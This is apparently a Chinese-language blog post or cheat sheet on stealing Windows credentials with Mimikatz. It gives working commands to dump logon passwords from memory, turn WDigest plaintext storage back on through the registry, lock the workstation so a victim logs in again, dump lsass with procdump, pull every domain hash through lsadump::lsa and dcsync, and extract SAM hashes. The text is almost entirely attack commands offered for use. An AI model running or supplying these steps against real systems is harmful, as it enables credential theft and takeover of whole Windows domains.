本地执行
privilege::debug //提升权限sekurlsa::logonpasswords //抓取密码
在windows2012和win8之后,或打了kb2871997的主机不能直接获取明文密码
WDigest
是lsass的一种ssp程序,主要用于win2003的ldap和基于web的身份验证。利用http和简单身份验证安全层(SA SL)进行身份验证
但这个认证机制会在内存中以加密形式保存win密码[sekurlsa::logonpasswords]
打了补丁以后就默认关闭了,但也不一定关闭,因为某些系统服务会用到wdigest认证,这不是绝对的
绕过
WDigest服务虽然关闭,但是可以通过操作对应的注册表来开启他
HKLM\SYSTEM\CurrentControlSet\Contorl\SecurityProviders\Wdigest
打了补丁或2008之后的主机会多一个UseLogonCredential项
当该项的值为1则记录明文密码,0则为不记录明文密码
记录明文密码reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
不记录明文密码reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
修改为注册表后,我们需要用户进行登录才能抓到明文密码可以进行锁屏操作强制他登录rundll32.exe user32.dll LockWorkStation
···#######111得到的
Procdump [dump lsass进程工具即可]+Mimikatz
procdump64.exe -accepteula -ma lsass.exe lsass.dmpmimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
读取域控中域成员Hash
使用mimikatz读取域控上所有域用户的hash值
#提升权限privilege::debug抓取密码lsadump::lsa /patch
域管理员权限
通过 dcsync,利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值,可以在域管权限下执行获取
#获取所有域用户lsadump::dcsync /domain:test.com /all /csv#指定获取某个用户的hashlsadump::dcsync /domain:test.com /user:test
SAM表获取hash
#导出SAM数据reg save HKLM\SYSTEM SYSTEMreg save HKLM\SAM SAM#使用mimikatz提取hashlsadump::sam /sam:SAM /system:SYSTEM
或者可以读取rdp连接记录
若有收获,就点个赞吧
0 人点赞
